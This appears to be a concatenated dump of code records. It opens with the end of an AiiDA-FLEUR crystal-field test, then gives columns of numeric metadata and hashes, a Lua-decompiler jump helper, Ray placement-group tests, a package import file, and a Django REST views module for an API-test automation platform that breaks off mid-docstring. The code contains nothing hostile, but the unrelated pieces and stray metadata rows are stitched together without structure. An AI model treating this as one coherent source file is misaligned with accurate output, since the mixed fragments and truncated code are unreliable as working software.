builder.scf.fleur = FleurCode
builder.scf.options = orm.Dict(dict=options).store()
builder.scf.inpgen = inpgen_local_code
builder.scf.structure = generate_smco5_structure()
builder.scf.calc_parameters = orm.Dict(
dict={
'comp': {
'kmax': 3.0,
'gmax': 7.0,
'gmaxxc': 7.0
},
'exco': {
'xctyp': 'vwn'
},
'kpt': {
'div1': 1,
'div2': 1,
'div3': 1
}
})
builder.scf_rare_earth_analogue.fleur = FleurCode
builder.scf_rare_earth_analogue.inpgen = inpgen_local_code
builder.scf_rare_earth_analogue.options = orm.Dict(dict=options).store()
builder.wf_parameters = orm.Dict(dict={'element': 'Sm', 'rare_earth_analogue': True})
# now run calculation
#run_with_cache(builder)
data_dir_path = os.path.join(aiida_path, '../tests/workflows/caches/fleur_cfcoeff_smco5_structure_analogue.tar.gz')
with with_export_cache(data_dir_abspath=data_dir_path):
out, node = run_get_node(builder)
#print(out)
#print(node)
print(get_workchain_report(node, 'REPORT'))
#assert node.is_finished_ok
# check output
n = out['output_cfcoeff_wc_para']
n = n.get_dict()
assert 'output_cfcoeff_wc_potentials' in out
assert 'output_cfcoeff_wc_charge_densities' in out
from pprint import pprint
pprint(n)
assert n['cf_coefficients_convention'] == 'Stevens'
assert n['cf_coefficients_site_symmetries'] == ['6/mmm']
assert n['angle_a_to_x_axis'] == 0.0
assert n['angle_c_to_z_axis'] == 0.0
assert sorted(n['cf_coefficients_spin_up'].keys()) == ['2/0', '4/0', '6/-6', '6/0', '6/6']
assert sorted(n['cf_coefficients_spin_down'].keys()) == ['2/0', '4/0', '6/-6', '6/0', '6/6']
keys = sorted(n['cf_coefficients_spin_up'].keys())
assert pytest.approx([n['cf_coefficients_spin_up'][key] for key in keys]) \
== [-1326.3111439024, 29.816507610986, 80.111746599164, 3.1490421501724, 80.111746599164]
assert pytest.approx([n['cf_coefficients_spin_down'][key] for key in keys]) \
== [-1237.5714206598,
20.016912116816,
75.244818163538,
2.6312426823951,
75.244818163538]
| 37.56621
| 119
| 0.602893
| 994
| 8,227
| 4.759557
| 0.239437
| 0.023674
| 0.044388
| 0.040161
| 0.809977
| 0.796449
| 0.789896
| 0.783555
| 0.768548
| 0.768548
| 0
| 0.066722
| 0.267655
| 8,227
| 218
| 120
| 37.738532
| 0.718506
| 0.143552
| 0
| 0.775
| 0
| 0
| 0.213091
| 0.12577
| 0
| 0
| 0
| 0
| 0.125
| 1
| 0.0125
| false
| 0
| 0.05625
| 0
| 0.06875
| 0.0375
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1e7f4edaa2213ca12c33c8ddb197c6a41ae4bc4f
| 174
|
py
|
Python
|
ljd/bytecode/helpers.py
|
mengjie0718/ljd
|
2e4f0c472c5247e9cca730736e0bbea9661d2cfd
|
[
"MIT"
] | 46
|
2019-01-01T09:41:24.000Z
|
2021-12-27T02:00:06.000Z
|
ljd/bytecode/helpers.py
|
mengjie0718/ljd
|
2e4f0c472c5247e9cca730736e0bbea9661d2cfd
|
[
"MIT"
] | 2
|
2020-11-17T20:35:47.000Z
|
2021-12-16T14:30:09.000Z
|
ljd/bytecode/helpers.py
|
mengjie0718/ljd
|
2e4f0c472c5247e9cca730736e0bbea9661d2cfd
|
[
"MIT"
] | 18
|
2018-11-18T17:08:35.000Z
|
2022-01-16T08:15:21.000Z
|
def get_jump_destination(addr, instruction):
return addr + instruction.CD + 1
def set_jump_destination(addr, instruction, value):
instruction.CD = value - addr - 1
| 24.857143
| 51
| 0.735632
| 23
| 174
| 5.391304
| 0.478261
| 0.362903
| 0.306452
| 0.483871
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013889
| 0.172414
| 174
| 6
| 52
| 29
| 0.847222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.25
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
1e8de3199ec9162a03dc8fe0eb221419251081e6
| 4,436
|
py
|
Python
|
python/ray/tests/test_placement_group.py
|
bentzinir/ray
|
39b84166f88e271b279bd0b3ce56f81d24a1852c
|
[
"Apache-2.0"
] | null | null | null |
python/ray/tests/test_placement_group.py
|
bentzinir/ray
|
39b84166f88e271b279bd0b3ce56f81d24a1852c
|
[
"Apache-2.0"
] | null | null | null |
python/ray/tests/test_placement_group.py
|
bentzinir/ray
|
39b84166f88e271b279bd0b3ce56f81d24a1852c
|
[
"Apache-2.0"
] | null | null | null |
import pytest
try:
import pytest_timeout
except ImportError:
pytest_timeout = None
import sys
import os
import ray
import ray.test_utils
import ray.cluster_utils
@pytest.mark.skipif(
os.environ.get("RAY_GCS_ACTOR_SERVICE_ENABLED") != "true",
reason=("This edge case is not handled when GCS actor management is off. "
"We won't fix this because GCS actor management "
"will be on by default anyway."))
def test_placement_group_pack(ray_start_cluster):
@ray.remote(num_cpus=2)
class Actor(object):
def __init__(self):
self.n = 0
def value(self):
return self.n
cluster = ray_start_cluster
num_nodes = 2
for _ in range(num_nodes):
cluster.add_node(num_cpus=4)
ray.init(address=cluster.address)
placement_group_id = ray.experimental.placement_group(
name="name", strategy="PACK", bundles=[{
"CPU": 2
}, {
"CPU": 2
}])
actor_1 = Actor.options(
placement_group_id=placement_group_id,
placement_group_bundle_index=0).remote()
actor_2 = Actor.options(
placement_group_id=placement_group_id,
placement_group_bundle_index=1).remote()
print(ray.get(actor_1.value.remote()))
print(ray.get(actor_2.value.remote()))
# Get all actors.
actor_infos = ray.actors()
# Make sure all actors in counter_list are collocated in one node.
actor_info_1 = actor_infos.get(actor_1._actor_id.hex())
actor_info_2 = actor_infos.get(actor_2._actor_id.hex())
assert actor_info_1 and actor_info_2
node_of_actor_1 = actor_info_1["Address"]["NodeID"]
node_of_actor_2 = actor_info_2["Address"]["NodeID"]
assert node_of_actor_1 == node_of_actor_2
@pytest.mark.skipif(
os.environ.get("RAY_GCS_ACTOR_SERVICE_ENABLED") != "true",
reason=("This edge case is not handled when GCS actor management is off. "
"We won't fix this because GCS actor management "
"will be on by default anyway."))
def test_placement_group_pack_best_effort(ray_start_cluster):
@ray.remote(num_cpus=2)
class Actor(object):
def __init__(self):
self.n = 0
def value(self):
return self.n
# TODO(Shanly):
pass
@pytest.mark.skipif(
os.environ.get("RAY_GCS_ACTOR_SERVICE_ENABLED") != "true",
reason=("This edge case is not handled when GCS actor management is off. "
"We won't fix this because GCS actor management "
"will be on by default anyway."))
def test_placement_group_spread(ray_start_cluster):
@ray.remote(num_cpus=2)
class Actor(object):
def __init__(self):
self.n = 0
def value(self):
return self.n
cluster = ray_start_cluster
num_nodes = 2
for _ in range(num_nodes):
cluster.add_node(num_cpus=4)
ray.init(address=cluster.address)
placement_group_id = ray.experimental.placement_group(
name="name", strategy="SPREAD", bundles=[{
"CPU": 2
}, {
"CPU": 2
}])
actor_1 = Actor.options(
placement_group_id=placement_group_id, bundle_index=0).remote()
actor_2 = Actor.options(
placement_group_id=placement_group_id, bundle_index=1).remote()
print(ray.get(actor_1.value.remote()))
print(ray.get(actor_2.value.remote()))
# Get all actors.
actor_infos = ray.actors()
# Make sure all actors in counter_list are collocated in one node.
actor_info_1 = actor_infos.get(actor_1._actor_id.hex())
actor_info_2 = actor_infos.get(actor_2._actor_id.hex())
assert actor_info_1 and actor_info_2
node_of_actor_1 = actor_info_1["Address"]["NodeID"]
node_of_actor_2 = actor_info_2["Address"]["NodeID"]
assert node_of_actor_1 != node_of_actor_2
@pytest.mark.skipif(
os.environ.get("RAY_GCS_ACTOR_SERVICE_ENABLED") != "true",
reason=("This edge case is not handled when GCS actor management is off. "
"We won't fix this because GCS actor management "
"will be on by default anyway."))
def test_placement_group_spread_best_effort(ray_start_cluster):
@ray.remote(num_cpus=2)
class Actor(object):
def __init__(self):
self.n = 0
def value(self):
return self.n
# TODO(Shanly):
pass
if __name__ == "__main__":
sys.exit(pytest.main(["-v", __file__]))
| 29.573333
| 78
| 0.657574
| 634
| 4,436
| 4.291798
| 0.167192
| 0.092613
| 0.058802
| 0.055127
| 0.935685
| 0.935685
| 0.935685
| 0.935685
| 0.935685
| 0.935685
| 0
| 0.015362
| 0.236925
| 4,436
| 149
| 79
| 29.771812
| 0.788479
| 0.042606
| 0
| 0.785714
| 0
| 0
| 0.184906
| 0.027358
| 0
| 0
| 0
| 0.006711
| 0.035714
| 1
| 0.107143
| false
| 0.017857
| 0.071429
| 0.035714
| 0.25
| 0.035714
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1ebcdfa2ac767a537cc2bbc54b679ea6501f8872
| 136
|
py
|
Python
|
dcp/models/__init__.py
|
baoyinhe/DCP
|
2348087ca824c36f131f590260eedf84aae5774d
|
[
"BSD-3-Clause"
] | 170
|
2019-01-24T07:57:40.000Z
|
2022-03-31T06:31:59.000Z
|
dcp/models/__init__.py
|
baoyinhe/DCP
|
2348087ca824c36f131f590260eedf84aae5774d
|
[
"BSD-3-Clause"
] | 16
|
2019-01-16T07:42:57.000Z
|
2021-11-24T03:22:31.000Z
|
dcp/models/__init__.py
|
baoyinhe/DCP
|
2348087ca824c36f131f590260eedf84aae5774d
|
[
"BSD-3-Clause"
] | 29
|
2019-01-28T02:16:59.000Z
|
2022-01-26T06:49:23.000Z
|
from .preresnet import *
from .pruned_preresnet import *
from .resnet import *
from .pruned_preresnet import *
from .pruned_vgg import *
| 27.2
| 31
| 0.786765
| 18
| 136
| 5.777778
| 0.333333
| 0.384615
| 0.548077
| 0.480769
| 0.673077
| 0.673077
| 0
| 0
| 0
| 0
| 0
| 0
| 0.139706
| 136
| 5
| 32
| 27.2
| 0.888889
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
1eca75dc07e190f4e13cec8533e9d9a4900cd680
| 65,078
|
py
|
Python
|
apitest/api_test/api/automation.py
|
willhuang1206/apitest
|
4b41855710ba8f21788027da83a830f631e11f26
|
[
"Apache-2.0"
] | null | null | null |
apitest/api_test/api/automation.py
|
willhuang1206/apitest
|
4b41855710ba8f21788027da83a830f631e11f26
|
[
"Apache-2.0"
] | 3
|
2020-06-06T01:57:41.000Z
|
2021-06-10T22:57:58.000Z
|
apitest/api_test/api/automation.py
|
willhuang1206/apitest
|
4b41855710ba8f21788027da83a830f631e11f26
|
[
"Apache-2.0"
] | null | null | null |
import logging
import traceback
import ast
from datetime import datetime
from django.core.exceptions import ObjectDoesNotExist
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.db import transaction
from django.db.models import Q
from api_test.common.auth import TokenAuthentication
from rest_framework.views import APIView
from api_test.common.api_response import JsonResponse
from api_test.common.common import record_dynamic
from api_test.common.paramUtil import ParamUtil
from api_test.common.jsonUtil import json
from api_test.service.runService import RunService
from api_test.service.taskService import TaskService
from api_test.service.publishService import PublishService
from api_test.service.commandService import CommandService
from api_test.common.auth import permission_required
from api_test.models import Project, Group, Automation, AutomationTask,AutomationStep, ApiInfo, Automation2Step,\
AutomationList2Automation,AutomationResult,ProjectConfig,PublishConfig
from api_test.serializers import ProjectSerializer,ApiInfoSerializer, AutomationSerializer, AutomationListSerializer,AutomationDeserializer, \
AutomationTaskSerializer,AutomationStepSerializer,AutomationResultSerializer,GroupSerializer,Automation2StepSerializer,\
AutomationList2AutomationSerializer,AutomationTaskDeserializer,PublishConfigSerializer,PublishConfigDeserializer
class GroupList(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def get(self, request):
"""
获取分组
:return:
"""
project_id = request.GET.get("project_id")
if not project_id:
return JsonResponse(code="999996", msg="参数有误!")
if not project_id.isdecimal():
return JsonResponse(code="999996", msg="参数有误!")
try:
pro_data = Project.objects.get(id=project_id)
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
pro_data = ProjectSerializer(pro_data)
if not pro_data.data["status"]:
return JsonResponse(code="999985", msg="该项目已禁用")
groups = getSubGroups(project_id)
return JsonResponse(data=groups, code="999999", msg="成功!")
def getSubGroups(project_id,groupId=None):
subGroups=[]
if groupId:
groups = Group.objects.filter(project=project_id,parent=groupId).order_by("id")
else:
groups = Group.objects.filter(project=project_id,parent__isnull=True).order_by("id")
for group in groups:
groupInfo={"id":str(group.id),"label":group.name,"value":{"path":"/autolist/project=%s/group=%s" % (project_id,group.id)}}
childGroups=getSubGroups(project_id,group.id)
if len(childGroups)>0:
groupInfo["children"]=childGroups
subGroups.append(groupInfo)
return subGroups
class AddGroup(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def parameter_check(self, data):
"""
校验参数
:param data:
:return:
"""
try:
# 校验project_id类型为int
if not isinstance(data["project_id"], int):
return JsonResponse(code="999996", msg="参数有误!")
# 必传参数 name, host
if not data["name"]:
return JsonResponse(code="999996", msg="参数有误!")
except KeyError:
return JsonResponse(code="999996", msg="参数有误!")
@permission_required("add_automationgroup")
def post(self, request):
"""
新增分组
:param request:
:return:
"""
data = request.data
result = self.parameter_check(data)
if result:
return result
try:
obj = Project.objects.get(id=data["project_id"])
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
pro_data = ProjectSerializer(obj)
if not pro_data.data["status"]:
return JsonResponse(code="999985", msg="该项目已禁用")
try:
parent = Group.objects.get(id=data["parent_id"])
except ObjectDoesNotExist:
parent=None
serializer = GroupSerializer(data=data)
if serializer.is_valid():
serializer.save(project=obj,parent=parent)
else:
return JsonResponse(code="999998", msg="失败!")
record_dynamic(project=serializer.data.get("id"),
_type="添加", operationObject="分组", user=request.user.pk,
data="新增分组“%s”" % data["name"])
return JsonResponse(data={
"group_id": serializer.data.get("id")
}, code="999999", msg="成功!")
class DelGroup(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def parameter_check(self, data):
"""
校验参数
:param data:
:return:
"""
try:
# 校验project_id, id类型为int
if not isinstance(data["project_id"], int) or not isinstance(data["id"], int):
return JsonResponse(code="999996", msg="参数有误!")
except KeyError:
return JsonResponse(code="999996", msg="参数有误!")
@permission_required("delete_automationgroup")
def post(self, request):
"""
删除分组
:param request:
:return:
"""
data = request.data
result = self.parameter_check(data)
if result:
return result
try:
pro_data = Project.objects.get(id=data["project_id"])
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
pro_data = ProjectSerializer(pro_data)
if not pro_data.data["status"]:
return JsonResponse(code="999985", msg="该项目已禁用")
obi = Group.objects.filter(id=data["id"], project=data["project_id"])
if obi:
name = obi[0].name
obi.delete()
else:
return JsonResponse(code="999991", msg="分组不存在!")
record_dynamic(project=data["project_id"],
_type="删除", operationObject="分组", user=request.user.pk, data="删除分组“%s”" % name)
return JsonResponse(code="999999", msg="成功!")
class UpdateNameGroup(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def parameter_check(self, data):
"""
校验参数
:param data:
:return:
"""
try:
# 校验project_id, id类型为int
if not isinstance(data["project_id"], int) or not isinstance(data["id"], int):
return JsonResponse(code="999996", msg="参数有误!")
# 必传参数 name, host
if not data["name"]:
return JsonResponse(code="999996", msg="参数有误!")
except KeyError:
return JsonResponse(code="999996", msg="参数有误!")
@permission_required("change_automationgroup")
def post(self, request):
"""
修改分组名称
:param request:
:return:
"""
data = request.data
result = self.parameter_check(data)
if result:
return result
try:
pro_data = Project.objects.get(id=data["project_id"])
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
pro_data = ProjectSerializer(pro_data)
if not pro_data.data["status"]:
return JsonResponse(code="999985", msg="该项目已禁用")
try:
obj = Group.objects.get(id=data["id"], project=data["project_id"])
except ObjectDoesNotExist:
return JsonResponse(code="999991", msg="分组不存在!")
serializer = GroupSerializer(data=data)
if serializer.is_valid():
serializer.update(instance=obj, validated_data=data)
else:
return JsonResponse(code="999998", msg="失败!")
record_dynamic(project=serializer.data.get("id"),
_type="修改", operationObject="分组", user=request.user.pk,
data="修改分组“%s”" % data["name"])
return JsonResponse(code="999999", msg="成功!")
class UpdateGroup(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def parameter_check(self, data):
"""
校验参数
:param data:
:return:
"""
try:
# 校验project_id, id类型为int
if not data["project_id"] or not data["ids"] or not data["group_id"]:
return JsonResponse(code="999996", msg="参数有误!")
if not isinstance(data["project_id"], int) or not isinstance(data["ids"], list) \
or not isinstance(data["group_id"], int):
return JsonResponse(code="999996", msg="参数有误!")
for i in data["ids"]:
if not isinstance(i, int):
return JsonResponse(code="999996", msg="参数有误!")
except KeyError:
return JsonResponse(code="999996", msg="参数有误!")
@permission_required("change_automationgroup")
def post(self, request):
"""
修改用例分组
:param request:
:return:
"""
data = request.data
result = self.parameter_check(data)
if result:
return result
try:
pro_data = Project.objects.get(id=data["project_id"])
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
pro_data = ProjectSerializer(pro_data)
if not pro_data.data["status"]:
return JsonResponse(code="999985", msg="该项目已禁用")
try:
obj = Group.objects.get(id=data["group_id"])
except ObjectDoesNotExist:
return JsonResponse(code="999991", msg="分组不存在!")
id_list = Q()
for i in data["ids"]:
id_list = id_list | Q(id=i)
case_list = Automation.objects.filter(id_list, project=data["project_id"])
with transaction.atomic():
case_list.update(group=obj)
name_list = []
for j in case_list:
name_list.append(str(j.name))
record_dynamic(project=data["project_id"],
_type="修改", operationObject="用例", user=request.user.pk, data="修改用例分组,列表“%s”" % name_list)
return JsonResponse(code="999999", msg="成功!")
class AutomationList(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def get(self, request):
"""
获取自动化列表
:param request:
:return:
"""
try:
page = int(request.GET.get("page", 1))
project_id = request.GET.get("project_id")
automation_id = request.GET.get("automation_id")
group_id = request.GET.get("first_group_id")
type = request.GET.get("type")
name = request.GET.get("name")
exclude = ast.literal_eval(request.GET.get("exclude","[]"))
page_size = int(request.GET.get("page_size", 20)) if not group_id else 100
except (TypeError, ValueError):
return JsonResponse(code="999985", msg="page and page_size must be integer!")
if not project_id:
return JsonResponse(code="999996", msg="参数有误!")
if not project_id.isdecimal():
return JsonResponse(code="999996", msg="参数有误!")
try:
pro_data = Project.objects.get(id=project_id)
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
pro_data = ProjectSerializer(pro_data)
if not pro_data.data["status"]:
return JsonResponse(code="999985", msg="该项目已禁用")
if automation_id:
automation=Automation.objects.get(id=automation_id)
obis=automation.automations.all().order_by("id")
else:
if group_id:
if not group_id.isdecimal():
return JsonResponse(code="999996", msg="参数有误!")
if name and type:
obis = Automation.objects.filter(Q(name__contains=name)|Q(publish__contains="'%s'" % name),project=project_id,group=group_id, type=type).exclude(id__in=exclude).order_by("-id")
elif name:
obis = Automation.objects.filter(Q(name__contains=name)|Q(publish__contains="'%s'" % name),project=project_id,group=group_id).exclude(id__in=exclude).order_by("-id")
elif type:
obis = Automation.objects.filter(project=project_id, type=type,group=group_id).exclude(id__in=exclude).order_by("-id")
else:
obis = Automation.objects.filter(project=project_id,group=group_id).exclude(id__in=exclude).order_by("-id")
else:
if name and type:
obis = Automation.objects.filter(Q(name__contains=name)|Q(group__name=name)|Q(publish__contains="'%s'" % name),project=project_id, type=type).exclude(id__in=exclude).order_by("-id")
elif name:
obis = Automation.objects.filter(Q(name__contains=name)|Q(group__name=name)|Q(publish__contains="'%s'" % name),project=project_id).exclude(id__in=exclude).order_by("-id")
elif type:
obis = Automation.objects.filter(project=project_id, type=type).exclude(id__in=exclude).order_by("-id")
else:
obis = Automation.objects.filter(project=project_id).exclude(id__in=exclude).order_by("-id")
paginator = Paginator(obis, page_size) # paginator对象
pages = paginator.num_pages # 总页数
total = len(obis)
try:
obm = paginator.page(page)
except PageNotAnInteger:
obm = paginator.page(1)
except EmptyPage:
obm = paginator.page(paginator.num_pages)
serialize = AutomationListSerializer(obm, many=True)
return JsonResponse(data={"data": serialize.data,
"page": page,
"pages": pages,
"page_size":page_size,
"total": total
}, code="999999", msg="成功!")
class AddAutomation(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def parameter_check(self, data):
"""
校验参数
:param data:
:return:
"""
try:
# 校验project_id, id类型为int
if not data["project_id"] or not data["name"] or not data["group_id"]:
return JsonResponse(code="999996", msg="参数有误!")
if not isinstance(data["project_id"], int) or not isinstance(data["group_id"], int):
return JsonResponse(code="999996", msg="参数有误!")
except KeyError:
return JsonResponse(code="999996", msg="参数有误!")
@permission_required("add_automation")
def post(self, request):
"""
添加用例
:param request:
:return:
"""
data = request.data
result = self.parameter_check(data)
if result:
return result
data["user"]=request.user.pk
try:
project = Project.objects.get(id=data["project_id"])
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
pro_data = ProjectSerializer(project)
if not pro_data.data["status"]:
return JsonResponse(code="999985", msg="该项目已禁用")
name = Automation.objects.filter(name=data["name"], project=data["project_id"])
if len(name):
return JsonResponse(code="999997", msg="存在相同名称!")
else:
with transaction.atomic():
try:
serialize = AutomationDeserializer(data=data)
if serialize.is_valid():
try:
group = Group.objects.get(id=data["group_id"], project=data["project_id"])
serialize.save(project=project, group=group, user=request.user)
if data["copyId"]:
if data["type"] in ("case","reuse","data"):
steps=Automation.objects.get(id=data["copyId"]).steps.all().order_by("automation2step__order")
for i, step in enumerate(steps):
if step.type=="normal":
step.id=None
step.save()
Automation2Step.objects.create(order=i+1,automation_id=serialize.data.get("id"),step=step)
elif data["type"]=="list":
automations=AutomationList2Automation.objects.filter(automationParent_id=data["copyId"],status=True).order_by("order")
for i, automation in enumerate(automations):
AutomationList2Automation.objects.create(order=i+1,automationParent_id=serialize.data.get("id"),automationStep=automation.automationStep)
elif data["type"]=="monitor":
apis=Automation.objects.get(id=data["copyId"]).apis.all()
automation=Automation.objects.get(id=serialize.data.get("id"))
for i, api in enumerate(apis):
automation.apis.add(api)
except KeyError:
serialize.save(project=project, user=request.user)
record_dynamic(project=data["project_id"],
_type="新增", operationObject="自动化", user=request.user.pk,
data="新增自动化\"%s\"" % data["name"])
return JsonResponse(data={"automation_id": serialize.data.get("id")},
code="999999", msg="成功!")
return JsonResponse(code="999996", msg="参数有误!")
except:
logging.error(traceback.format_exc())
return JsonResponse(code="999998", msg="失败!")
class UpdateAutomation(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def parameter_check(self, data):
"""
校验参数
:param data:
:return:
"""
try:
# 校验project_id, id类型为int
if not data["project_id"] or not data["name"] or not data["id"] \
or not data["group_id"]:
return JsonResponse(code="999996", msg="参数有误!")
if not isinstance(data["project_id"], int) or not isinstance(data["id"], int) \
or not isinstance(data["group_id"], int):
return JsonResponse(code="999996", msg="参数有误!")
except KeyError:
return JsonResponse(code="999996", msg="参数有误!")
@permission_required("change_automation")
def post(self, request):
"""
修改自动化
:param request:
:return:
"""
data = request.data
result = self.parameter_check(data)
if result:
return result
try:
project = Project.objects.get(id=data["project_id"])
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
try:
automation = Automation.objects.get(id=data["id"], project=data["project_id"])
except ObjectDoesNotExist:
return JsonResponse(code="999987", msg="自动化用例不存在!")
try:
Group.objects.get(id=data["group_id"], project=data["project_id"])
except ObjectDoesNotExist:
return JsonResponse(code="999991", msg="分组不存在!")
name = Automation.objects.filter(name=data["name"], project=data["project_id"]).exclude(id=data["id"])
if len(name):
return JsonResponse(code="999997", msg="存在相同名称!")
else:
try:
serialize = AutomationDeserializer(data=data)
if serialize.is_valid():
data["user_id"] = request.user.pk
serialize.update(instance=automation, validated_data=data)
if "orders" in data:
orders=data["orders"]
for index,id in enumerate(orders):
if automation.type in ("case","reuse"):
Automation2Step.objects.filter(id=id).update(order=index+1)
elif automation.type in ("list"):
AutomationList2Automation.objects.filter(id=id).update(order=index+1)
record_dynamic(project=data["project_id"],
_type="修改", operationObject="自动化", user=request.user.pk, data="修改自动化\"%s\"" % data["name"])
return JsonResponse(code="999999", msg="成功!")
return JsonResponse(code="999998", msg="失败!")
except:
logging.error(traceback.format_exc())
class DelAutomation(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def parameter_check(self, data):
"""
校验参数
:param data:
:return:
"""
try:
# 校验project_id, id类型为int
if not data["project_id"] or not data["ids"]:
return JsonResponse(code="999996", msg="参数有误!")
if not isinstance(data["project_id"], int) or not isinstance(data["ids"], list):
return JsonResponse(code="999996", msg="参数有误!")
for i in data["ids"]:
if not isinstance(i, int):
return JsonResponse(code="999996", msg="参数有误!")
except KeyError:
return JsonResponse(code="999996", msg="参数有误!")
@permission_required("delete_automation")
def post(self, request):
"""
删除用例
:param request:
:return:
"""
data = request.data
result = self.parameter_check(data)
if result:
return result
try:
project = Project.objects.get(id=data["project_id"])
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
project = ProjectSerializer(project)
if not project.data["status"]:
return JsonResponse(code="999985", msg="该项目已禁用")
try:
for j in data["ids"]:
with transaction.atomic():
obi = Automation.objects.filter(id=j, project=data['project_id'])
if len(obi) != 0:
name = obi[0].name
if obi[0].type in ("case","reuse","data"):
steps=obi[0].steps.all()
for step in steps:
if step.type=="normal":
step.delete()
obi.delete()
record_dynamic(project=data["project_id"],
_type="删除", operationObject="自动化", user=request.user.pk, data="删除自动化\"%s\"" % name)
except Exception:
logging.error(traceback.format_exc())
return JsonResponse(code="999999", msg="成功!")
class StepList(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def get(self, request):
"""
获取用例步骤列表
:param request:
:return:
"""
try:
page_size = int(request.GET.get("page_size", 1000))
page = int(request.GET.get("page", 1))
except (TypeError, ValueError):
return JsonResponse(code="999985", msg="page and page_size must be integer!")
if request.GET.get("automation_id"):
automation_id = request.GET.get("automation_id")
if not automation_id.isdecimal():
return JsonResponse(code="999996", msg="参数有误!")
try:
automation=Automation.objects.get(id=automation_id)
except ObjectDoesNotExist:
return JsonResponse(code="999987", msg="自动化不存在!")
if automation.type in ("case","reuse","data"):
steps=Automation2Step.objects.filter(automation=automation).order_by("order")
# steps=automation.steps.all().order_by("automation2step__order")
steps=Automation2StepSerializer(steps, many=True).data
results=AutomationResult.objects.filter(automation=automation_id,step=None).order_by("-id")[:10].values("trace","result","testTime")
elif automation.type=="list":
steps=AutomationList2Automation.objects.filter(automationParent=automation).order_by("order")
steps=AutomationList2AutomationSerializer(steps, many=True).data
results=AutomationResult.objects.filter(automation=automation_id,step=None).order_by("-id")[:10].values("trace","result","testTime")
elif automation.type=="monitor":
steps=automation.apis.all().order_by("id")
steps=ApiInfoSerializer(steps, many=True).data
results=AutomationResult.objects.filter(automation=automation_id,api=None).order_by("-id")[:10].values("trace","result","testTime")
# step = AutomationStep.objects.filter(automation=automation_id).order_by("id")
return JsonResponse(data={"steps": steps,
"automation": AutomationSerializer(automation).data,
"results":results,
}, code="999999", msg="成功!")
else:
project_id = int(request.GET.get("project_id"))
# automation_id = int(request.GET.get("automation_id"))
steps = AutomationStep.objects.filter(Q(type="project",project=project_id)|Q(type="global")).order_by("id")
paginator = Paginator(steps, page_size) # paginator对象
pages = paginator.num_pages # 总页数
total = len(steps)
try:
obm = paginator.page(page)
except PageNotAnInteger:
obm = paginator.page(1)
except EmptyPage:
obm = paginator.page(paginator.num_pages)
serialize = AutomationStepSerializer(obm, many=True)
return JsonResponse(data={"data": serialize.data,
"page": page,
"pages": pages,
"total": total
}, code="999999", msg="成功!")
class StepInfo(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def get(self, request):
"""
获取步骤详细信息
:param request:
:return:
"""
automation_id = request.GET.get("automation_id")
step_id = request.GET.get("step_id")
if not automation_id.isdecimal() or not step_id.isdecimal():
return JsonResponse(code="999996", msg="参数有误!")
try:
Automation.objects.get(id=automation_id)
except ObjectDoesNotExist:
return JsonResponse(code="999987", msg="用例不存在!")
try:
obm = AutomationStep.objects.get(id=step_id)
except ObjectDoesNotExist:
return JsonResponse(code="999990", msg="步骤不存在!")
data = AutomationStepSerializer(obm).data
return JsonResponse(data=data, code="999999", msg="成功!")
class AddStep(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def parameter_check(self, data):
"""
校验参数
:param data:
:return:
"""
try:
if not data["name"] or not data["type"] or not data["steps"] or not data["order"]:
return JsonResponse(code="999996", msg="参数有误!")
if not data["automation_id"] or not data["project_id"]:
return JsonResponse(code="999996", msg="参数有误!")
if data["type"] not in ["normal","project","global"]:
return JsonResponse(code="999996", msg="参数有误!")
except KeyError:
return JsonResponse(code="999996", msg="参数有误!")
@permission_required("change_automation")
def post(self, request):
"""
新增用例步骤
